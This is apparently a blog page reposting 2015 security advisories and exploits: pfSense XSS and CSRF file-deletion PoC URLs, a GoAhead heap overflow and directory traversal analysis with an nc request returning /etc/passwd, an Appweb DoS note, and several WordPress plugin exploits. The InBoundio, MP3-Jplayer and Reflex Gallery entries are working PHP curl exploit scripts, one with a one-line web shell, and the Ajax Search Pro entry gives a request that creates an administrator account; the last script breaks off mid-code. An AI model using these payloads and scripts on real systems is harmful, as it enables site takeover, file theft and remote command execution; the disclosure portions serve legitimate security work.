MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

31Mar/150

pfSense Arbitrary file deletion and multiple XSS

Advisory ID: HTB23251
Product: pfSense
Vendor: Electric Sheep Fencing LLC 
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Advisory Publication:  March 4, 2015  [without technical details]
Vendor Notification: March 4, 2015 
Vendor Patch: March 5, 2015 
Public Disclosure: March 25, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-2294, CVE-2015-2295
Risk Level: Medium 
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 (AV:N/AC:H/Au:N/C:N/I:N/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web interface of pfSense, which can be 
exploited to perform Cross-Site Scripting (XSS) attacks against administrator of pfSense and delete arbitrary files via 
CSRF (Cross-Site Request Forgery) attacks.
 
Successful exploitation of the vulnerabilities may allow an attacker to delete arbitrary files on the system with root 
privileges, steal administrator’s cookies and gain complete control over the web application and even the entire 
system, as pfSense is running with root privileges and allows OS command execution via its web interface.
 
 
1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294
 
1.1 Input passed via the "zone" HTTP GET parameter to "/status_captiveportal.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted 
link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.2 Input passed via the "if" and "dragtable" HTTP GET parameters to "/firewall_rules.php" script is not properly 
sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially 
crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
Below are two PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.3 Input passed via the "queue" HTTP GET parameter to "/firewall_shaper.php" script is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and 
execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.4 Input passed via the "id" HTTP GET parameter to "/services_unbound_acls.php" script is not properly sanitised 
before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted 
link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
1.5 Input passed via the "filterlogentries_time", "filterlogentries_sourceipaddress", "filterlogentries_sourceport", 
"filterlogentries_destinationipaddress", "filterlogentries_interfaces", "filterlogentries_destinationport", 
"filterlogentries_protocolflags" and "filterlogentries_qty" HTTP GET parameters to "/diag_logs_filter.php" script is 
not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open 
a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
Below are eight PoC codes for each vulnerable parameter that use JS "alert()" function to display "ImmuniWeb" popup:
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_interfaces=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E
 
 
2) Cross-Site Request Forgery (CSRF) in pfSense: CVE-2015-2295
 
2.1 The vulnerability exists due to insufficient validation of the HTTP request origin in 
"/system_firmware_restorefullbackup.php" script. A remote attacker can trick a log-in administrator to visit a 
malicious page with CSRF exploit and delete arbitrary files on the target system with root privileges.
 
The following PoC code deletes file "/etc/passwd":
 
https://[host]/system_firmware_restorefullbackup.php?deletefile=../etc/passwd
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to pfSense 2.2.1
 
More Information:
https://blog.pfsense.org/?p=1661
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23251 - https://www.htbridge.com/advisory/HTB23251 - Arbitrary file deletion and 
multiple XSS vulnerabilities in pfSense.
[2] pfSense - https://www.pfsense.org - The pfSense® project is a free, open source customized distribution of FreeBSD 
specifically tailored for use as a firewall and router that is entirely managed via web interface.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(8)

31Mar/150

GoAhead Web Server heap overflow and directory traversal

Affected software: GoAhead Web Server
Affected versions: 3.0.0 - 3.4.1 (3.x.x series before 3.4.2)
CVE ID: CVE-2014-9707

Description: The server incorrectly normalizes HTTP request URIs that
contain path segments that start with a "." but are not entirely equal
to "." or ".." (eg. ".x"). By sending a request with a URI that
contains these incorrectly handled segments, it is possible for remote
attackers to cause a heap overflow with attacker-controlled content or
perform a directory traversal attack.

Fixed version: 3.4.2
Bug entry: https://github.com/embedthis/goahead/issues/106
Fix: https://github.com/embedthis/goahead/commit/eed4a7d177bf94a54c7b06ccce88507fbd76fb77
Reported by: Matthew Daley

Detail:

The vulnerability lies in the websNormalizeUriPath function. This
function correctly handles the normalization of URIs consisting of
normal segments as well as "." and ".." segments, but fails to handle
other segments that start with a '.' character.

A quick runthrough of the important parts of this function:

The function starts by splitting up the URI into segments (at forward
slashes) into an array. At the same time, it calculates the total
length of these segments.

The function then iterates through the resulting array in order to
perform an in-place normalization (both the input and output pointers
point to the same array):

* If a given segment does not start with a '.', it is simply copied from the
current input pointer to the current output pointer. The for loop's
increment code will then advance both the input and output pointers.

* Otherwise, if the segment is "." or "..", the input and output pointers are
adjusted appropriately (taking into account the for loop's increment code)
but (correctly) no segment is copied.

* Otherwise the segment starts with a '.' but is not "." nor ".."; in this
case the function incorrectly does nothing and both the input and output
pointers are simply advanced by the for loop's increment code. This
effectively skips over a segment in the segment array without any
modification by the function.

After this iteration has completed, a string buffer for the final
output is allocated. The size used for this allocation comes from the
previously-calculated total segment length, with the addition of space
for forward slashes to join the segments back together again and a
null terminator. The segments in the array up to the final output
pointer are joined together in this buffer with forward slashes
separating them.

There are two ways to exploit this incorrect handling of certain segments:

1) Heap overflow

The heap overflow exploitation lies in the possibility to create a
disconnect between the lengths of the segments left in the segment
array after the iteration has completed and the previously-calculated
total segment length. The previously-calculated length should, in
theory, be the worst-case (longest) final output string buffer size
required (when all segments are left and none are removed by the
normalization iteration). However, since we can force the iteration to
skip over certain segments in the array, it is possible to effectively
duplicate segments in the resulting array; this is done by having the
segment copied from one location to another but then also having the
original copy skipped over, making it appear in the resulting array
twice. When this is done, the previously-calculated length is no
longer long enough for the final output's string buffer, and a heap
overflow occurs while joining together the final result.

As an example, take the following URI as input to the function:
"/./AAAAAAAA/.x".

The URI is first split into the segments "", ".", "AAAAAAAA" and ".",
with the total segment length calculated as 0 + 1 + 8 + 2 = 11 bytes.

The normalization iteration proceeds as follows:

* The "" segment is simply copied from input to output, and hence remains
unchanged. Both the input and output pointers are then advanced.

* The "." segment causes the output pointer to stay in place while the input
pointer advances forward.

* The "AAAAAAAA" segment is simply copied from input to output, and hence
overwrites the previous "." segment. Both the input and output pointers are
then advanced.

* Finally, the ".x" segment is incorrectly handled: no modification of
segments is performed but both the input and output pointers are still
advanced, moving the output pointer over the original "AAAAAAAA" segment.

Hence, the resulting segments in the array that are left up to the
final output pointer are "", "AAAAAAAA" and "AAAAAAAA". Note that the
"AAAAAAAA" segment has been duplicated. These segments, including
space for forward slashes to join them together with and a null
terminator, have a total length of 0 + 8 + 8 + 2 + 1 = 19 bytes.

A string buffer is then allocated for the final output, which uses the
previously-calculated total segment length of 11 bytes plus 3 bytes
for forward slashes and 1 byte for a null terminator, giving a total
size of 11 + 3 + 1 = 15 bytes.

The resulting segments are finally joined together into this final
output string buffer. In doing so in this case, however, the buffer is
overflowed by 19 - 15 = 4 bytes.

So, a remote attacker can make (ie.) a simple HTTP GET request for the
URI in question and cause a heap overflow. ASAN gives the following
output in this case, which shows the exact moment that the heap
overflow occurs:

=================================================================
==2613==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60200000d47f at pc 0x7ffff6f34020 bp 0x7fffffffd410 sp
0x7fffffffcbd0
WRITE of size 9 at 0x60200000d47f thread T0
#0 0x7ffff6f3401f in __interceptor_strcpy
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2f01f)
#1 0x7ffff63a7d6d in websNormalizeUriPath src/http.c:3320
#2 0x7ffff639b4de in parseFirstLine src/http.c:969
#3 0x7ffff639a905 in parseIncoming src/http.c:880
#4 0x7ffff639a4c9 in websPump src/http.c:829
#5 0x7ffff639a19c in readEvent src/http.c:802
#6 0x7ffff6399de7 in socketEvent src/http.c:740
#7 0x7ffff6399cbc in websAccept src/http.c:719
#8 0x7ffff63ac8ed in socketAccept src/socket.c:327
#9 0x7ffff63ade95 in socketDoEvent src/socket.c:638
#10 0x7ffff63add5f in socketProcess src/socket.c:622
#11 0x7ffff639daf8 in websServiceEvents src/http.c:1307
#12 0x401b5c in main src/goahead.c:153
#13 0x7ffff597ab44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#14 0x4011d8
(/home/matthew/goahead-3.4.1/build/linux-x64-debug/bin/goahead+0x4011d8)

0x60200000d47f is located 0 bytes to the right of 15-byte region
[0x60200000d470,0x60200000d47f)
allocated by thread T0 here:
#0 0x7ffff6f5973f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x7ffff63a7d04 in websNormalizeUriPath src/http.c:3318
#2 0x7ffff639b4de in parseFirstLine src/http.c:969
#3 0x7ffff639a905 in parseIncoming src/http.c:880
#4 0x7ffff639a4c9 in websPump src/http.c:829
#5 0x7ffff639a19c in readEvent src/http.c:802
#6 0x7ffff6399de7 in socketEvent src/http.c:740
#7 0x7ffff6399cbc in websAccept src/http.c:719
#8 0x7ffff63ac8ed in socketAccept src/socket.c:327
#9 0x7ffff63ade95 in socketDoEvent src/socket.c:638
#10 0x7ffff63add5f in socketProcess src/socket.c:622
#11 0x7ffff639daf8 in websServiceEvents src/http.c:1307
#12 0x401b5c in main src/goahead.c:153
#13 0x7ffff597ab44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
(... snip ...)

As with all heap overflows, it's likely that this can then go on to be
exploited in order to gain full remote code execution, especially in
embedded systems which are less likely to have heap allocators with
modern hardening techniques.

2) Directory traversal

The directory traversal exploitation lies in the fact that we can
force the normalization iteration to skip over certain segments in the
array; namely, we can force it to skip over a ".." segment. The ".."
segment will pass through unchanged into the final output string
buffer, where it is treated by the rest of the server as an actual
parent-directory relative segment.

As an example, take the following URI as input to the function:
"/../../../../../.x/.x/.x/.x/.x/.x/etc/passwd".

The URI is first split into the segments "", "..", "..", "..", "..",
"..", ".x", ".x", ".x", ".x", ".x", ".x", "etc", and "passwd". (The
total segment length that is calculated during this operation is
irrelevant for this mode of exploitation.)

When the normalization iteration reaches the ".x" segments, the
contents of the segment array are still untouched (as all the previous
segments are either empty or are "..") and the output pointer is still
pointing back at the "" segment. The incorrect handling of the ".x"
segments only causes the output (and input) pointers to be advanced
forward over the "" and ".." segments.

When the iteration reaches the "etc" segment, all the "" and ".."
segments have been skipped over; the output pointer is now pointing at
the first ".x" segment. The "etc" is copied over the first ".x"
segment, and the "passwd" segment is copied over the second ".x"
segment.

Hence, the resulting segments in the array that are left up to the
final output pointer are "", "..", "..", "..", "..", "..", "etc" and
"passwd"; note that the ".." segments are still present.

The final output string buffer is created and the resulting segments
are joined together to give a string of "/../../../../../etc/passwd".

The rest of the server is expecting that the result from the function
is normalized and that it contains no relative segments. Hence, the
".." segments go unnoticed when opening the content file while
handling the HTTP request. The end result is that the local filesystem
is traversed up from the administrator-configured web root until
reaching the filesystem's root directory and back down again into the
"/etc/passwd" file. Hence, the file "/etc/passwd" is given in response
to the HTTP request, regardless of the configured web root.

So, a remote attacker can make (ie.) a simple HTTP GET request for the
URI in question and get the contents of the "/etc/passwd" file:

$ echo -ne 'GET /../../../../../.x/.x/.x/.x/.x/.x/etc/passwd
HTTP/1.0\r\n\r\n' | nc localhost 4700
HTTP/1.0 200 OK
Server: GoAhead-http
Date: Sun Nov 16 17:21:01 2014
Content-Length: 1346
Connection: close
Last-Modified: Sat Oct 25 17:07:25 2014

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
(... snip ...)

Of course, 5 ".." segments may not be enough to reach the filesystem's
root directory in all cases and so the crafted URI may have to be
extended with more ".." and ".x" segments.

- Matthew Daley

(17)

31Mar/150

Appweb Web Server remotely-triggerable DoS

Affected software: Appweb Web Server
CVE ID: CVE-2014-9708
 
Description: An HTTP request with a Range header of the form "Range:
x=," (ie. with an empty range value) will cause a null pointer
dereference, leading to a remotely-triggerable DoS.
 
Fixed versions: 4.6.6, 5.2.1
Bug entry: https://github.com/embedthis/appweb/issues/413
Fix: 
https://github.com/embedthis/appweb/commit/7e6a925f5e86a19a7934a94bbd6959101d0b84eb#diff-7ca4d62c70220e0e226e7beac90c95d9L17348
Reported by: Matthew Daley
 
- Matthew Daley

(7)

30Mar/150

WordPress InBoundio Marketing Shell Upload

<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.inboundio.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
# remote attacker can upload file/shell/backdoor and exec commands.
#
####
# Lines (6... to 20) : csv_uploader.php
####
#
# ExpLO!T : 
# -------
 
$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
 
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
 
/*
[!] creat your shell file =>
 _ k3dz.php :
 
 <?php system($_GET['dz']); ?>
 
[>] Post the exploit 
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
[+] Or upload what you whant ^_^ ...
 
*/
 
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
 
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
 
?>

(36)

30Mar/150

WordPress MP3-Jplayer 2.1 Local File Disclosure

<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://mp3-jplayer.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin mp3-jplayer v2.3 is suffer from local file disclosure,
# remote attacker can Download/Disclosure file's from the root-path. 
#
# ExpLO!T : 
# -------
#
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ]%00.mp3"); # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg
curl_setopt($dz, CURLOPT_HTTPGET, 1);
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
 
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####
 
# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html
 
?>

(12)

30Mar/150

WordPress AB Google Map Travel CSRF / XSS

===============================================================================
CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
===============================================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/
* Severity: HIGH
* Version Affected: Version 3.4  and mostly prior to it
* Version Tested : Version  3.4
* version patched: 
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
* Latitude:
* Longitude:
* Map Width:
* Map Height:
* Map Zoom:
* And all Input Boxes
 
 
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
 
Vulnerability Class
===================     
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting       (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) 
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
After installing the plugin
 
1. Goto settings -> Google Map Travel
 
2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## Into Any above mention Vulnerable parameter  
Save settings and see XSS in action
 
3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored.
 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST">
      <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" />
<input type="hidden" name="long" value="76.26730" />
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="map_width" value="500" />
      <input type="hidden" name="map_height" value="300" />
      <input type="hidden" name="zoom" value="7" />
      <input type="hidden" name="day_less_five_fare" value="llllll" />
      <input type="hidden" name="day_more_five_fare" value="1.5" />
      <input type="hidden" name="less_five_fare" value="3" />
      <input type="hidden" name="more_five_fare" value="2.5" />
      <input type="hidden" name="curr_format" value="$" />
      <input type="hidden" name="submit" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
. image:: csrf.jpeg
   :height: 1000 px
   :width:  1000 px
   :scale: 100 %
   :alt: XSS POC
   :align: center
 
 
 
 
Mitigation 
==========
Update to version 4.0
 
Change Log
==========
https://wordpress.org/plugins/ab-google-map-travel/changelog/
 
Disclosure 
==========
07-March-2015 Reported to Developer
11-March-2015 Reported to Wordpress
11-March-2015 Acknowledgement from Developer
16-March-2015 Wordpress reviwed and publish the updated plugin.
16-March-2015 Requested for CVE ID
 
 
credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh@me.com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

(22)

30Mar/150

WordPress Ajax Search Pro Remote Code Execution

------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------
 
[-] Plugin Link:
 
http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410
 
also affected:
    https://wordpress.org/plugins/ajax-search-lite/
    https://wordpress.org/plugins/related-posts-lite/
 
[-] Vulnerability Description:
 
This vulnerability allows any registered user to execute arbitrary functions
vulnerability code:
 
add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
    function wpdreams_ajaxinputcallback() {
        $param = $_POST;
        echo call_user_func($_POST['wpdreams_callback'], $param);
        exit;
    }
}
 
this will allow any registered user to execute any function he wants with
1st param set to array($_POST)
since wordpress core provides some functions that accept 1st param as an
array then,
wp_insert_user have a role option for the user you are inserting, this
option can insert a new administrator
 
[-] Proof of Concept:
 
this will register an administrator with username "xADMIN" and password
"xPASS"
 
url:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
post data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
 
[-] Fix:
 
Updated to the latest version.
 
[-] Timeline:
 
09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure
 
[-] Refernces:
http://research.evex.pw/?vuln=9 <http://research.evex.pw/?vuln=8>
 
@Evex_1337

(21)

21Mar/150

WordPress Reflex Gallery 3.1.3 Shell Upload

<?php
 
/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369
 
--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type = "file" name = "qqfile"><br>
  <input type = "submit" name = "Submit" value = "Pwn!">
  </form >
 
--------------------------------------------------------------------------------
 
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin   http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl/
  # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 */
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
 
function __plus() {
 
    ob_flush();
    flush();
}
 
function __request($params) {
 
    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL,
"{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' =>
"@{$params['file']}"));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    $info['corpo'] = curl_exec($objcurl) . __plus();
    $info['server'] = curl_getinfo($objcurl) . __plus();
    curl_close($objcurl) . __plus();
    return $info;
}
 
echo "[+]  Wordpress Plugin Reflex Gallery - Arbitrary File Upload
Vulnerability\n\n";
$params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO]
DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1],
'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE
TARGET!\n"));
__request($params) . __plus();
$_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}";
$_h =
get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}",
1);
foreach ($_h as $key => $value) {
    echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200'));
